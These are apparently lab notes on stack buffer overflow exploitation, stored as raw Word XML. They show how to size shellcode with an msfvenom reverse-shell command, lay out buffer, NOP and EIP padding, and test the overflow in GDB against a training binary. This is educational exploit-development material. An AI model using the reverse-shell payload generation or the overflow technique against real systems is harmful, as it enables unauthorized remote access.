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1B18" w14:textId="77777777" w:rsidR="00A412D5" w:rsidRPr="00A412D5" w:rsidRDefault="00A412D5" w:rsidP="00A412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  <w:t>Determine the Length for Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DE42FC" w14:textId="77777777" w:rsidR="00A412D5" w:rsidRPr="00A412D5" w:rsidRDefault="00A412D5" w:rsidP="00A412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44110E7F">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BC7A29" w14:textId="77777777" w:rsidR="00A412D5" w:rsidRPr="00A412D5" w:rsidRDefault="00A412D5" w:rsidP="00A4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Now we should find out how much space we have for our shellcode to perform the action we want. It is trendy and useful for us to exploit such a vulnerability to get a reverse shell. First, we have to find out approximately how big our shellcode will be that we will insert, and for this, we will use </w:t>
      </w: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msfvenom</w:t>
      </w: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20A77513" w14:textId="77777777" w:rsidR="00A412D5" w:rsidRPr="00A412D5" w:rsidRDefault="00A412D5" w:rsidP="00A4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Shellcode - Length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53432F3F" w14:textId="77777777" w:rsidR="00A412D5" w:rsidRPr="00A412D5" w:rsidRDefault="00A412D5" w:rsidP="00A412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Shellcode - Length </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53785974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yovecio@htb[/htb]$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 lport=31337 --platform linux --arch x86 --format c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0CA19D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3EA0E225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No encoder or badchars specified, outputting raw payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1084AD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Payload size: 68 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBEB584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58466C88" w14:textId="77777777" w:rsidR="00A412D5" w:rsidRPr="00A412D5" w:rsidRDefault="00A412D5" w:rsidP="00A4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We now know that our payload will be about 68 bytes. As a precaution, we should try to take a larger range if the shellcode increases due to later specifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BE869C" w14:textId="77777777" w:rsidR="00A412D5" w:rsidRPr="00A412D5" w:rsidRDefault="00A412D5" w:rsidP="00A4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Often it can be useful to insert some </w:t>
      </w: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no operation instruction</w:t>
      </w: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(</w:t>
      </w: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NOPS</w:t>
      </w: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) before our shellcode begins so that it can be executed cleanly. Let us briefly summarize what we need for this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483EC30C" w14:textId="77777777" w:rsidR="00A412D5" w:rsidRPr="00A412D5" w:rsidRDefault="00A412D5" w:rsidP="00A41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need a total of 1040 bytes to get to the </w:t>
      </w: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EIP</w:t>
      </w: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2ACD7BED" w14:textId="77777777" w:rsidR="00A412D5" w:rsidRPr="00A412D5" w:rsidRDefault="00A412D5" w:rsidP="00A41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Here, we can use an additional </w:t>
      </w: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100 bytes</w:t>
      </w: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of </w:t>
      </w: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NOPs</w:t>
      </w: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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28180166" w14:textId="77777777" w:rsidR="00A412D5" w:rsidRPr="00A412D5" w:rsidRDefault="00A412D5" w:rsidP="00A41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150 bytes</w:t>
      </w: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for our </w:t>
      </w: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shellcode</w:t>
      </w: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3BFA78C7" w14:textId="77777777" w:rsidR="00A412D5" w:rsidRPr="00A412D5" w:rsidRDefault="00A412D5" w:rsidP="00A412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Shellcode - Length </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F83227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Buffer = "\x55" * (1040 - 100 - 150 - 4) = 786</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A8BD10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NOPs = "\x90" * 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2269DFD0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Shellcode = "\x44" * 150</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BBEF99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EIP = "\x66" * 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE3B3E6" w14:textId="77777777" w:rsidR="00A412D5" w:rsidRPr="00A412D5" w:rsidRDefault="00A412D5" w:rsidP="00A4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Buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507946EF" w14:textId="379B3A86" w:rsidR="00A412D5" w:rsidRPr="00A412D5" w:rsidRDefault="00A412D5" w:rsidP="00A4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5D65FED5" wp14:editId="621DBFFD">
            <wp:extent cx="5731510" cy="1891665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="686100881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2A7F" w14:textId="77777777" w:rsidR="00A412D5" w:rsidRPr="00A412D5" w:rsidRDefault="00A412D5" w:rsidP="00A4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Now we can try to find out how much space we have available to insert our shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A224A7" w14:textId="77777777" w:rsidR="00A412D5" w:rsidRPr="00A412D5" w:rsidRDefault="00A412D5" w:rsidP="00A4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lastRenderedPageBreak/>
        <w:t>GDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C64DE54" w14:textId="77777777" w:rsidR="00A412D5" w:rsidRPr="00A412D5" w:rsidRDefault="00A412D5" w:rsidP="00A412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GDB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B2172E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(gdb) run $(python -c 'print "\x55" * (1040 - 100 - 150 - 4) + "\x90" * 100 + "\x44" * 150 + "\x66" * 4')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F30114F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0214D620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The program being debugged has been started already.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7467359B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Start it from the beginning? (y or n) y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36806D0E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77E4724C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Starting program: /home/student/bow/bow32 $(python -c 'print "\x55" * (1040 - 100 - 150 - 4) + "\x90" * 100 + "\x44" * 150 + "\x66" * 4')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1201C101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Program received signal SIGSEGV, Segmentation fault.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6855EC59" w14:textId="77777777" w:rsidR="00A412D5" w:rsidRPr="00A412D5" w:rsidRDefault="00A412D5" w:rsidP="00A4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12D5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0x66666666 in ?? ()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4358F9E2" w14:textId="77777777" w:rsidR="00A412D5" w:rsidRPr="00A412D5" w:rsidRDefault="00A412D5" w:rsidP="00A4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Buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47772DFD" w14:textId="12EB17A1" w:rsidR="00A412D5" w:rsidRPr="00A412D5" w:rsidRDefault="00A412D5" w:rsidP="00A4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12D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2CEE07B3" wp14:editId="59210084">
            <wp:extent cx="5731510" cy="1747520"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="175286366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B962" w14:textId="77777777" w:rsidR="00213442" w:rsidRPr="00A412D5" w:rsidRDefault="00213442" w:rsidP="00A412D5"/>
    <w:sectPr w:rsidR="00213442" w:rsidRPr="00A4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970"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="85C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12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BC"/>
    <w:rsid w:val="00213442"/>
    <w:rsid w:val="008058BC"/>
    <w:rsid w:val="00A4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E4974"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6EA9C3D7-6367-4166-ACC1-CF07ED33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2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412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SE"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D5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12D5"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24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12D5"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="windowtitle">
    <w:name w:val="window_title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A412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2D5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token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A412D5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-gray">
    <w:name w:val="text-gray"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A412D5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-success">
    <w:name w:val="text-success"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A4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2023-09-07T14:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-07T14:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>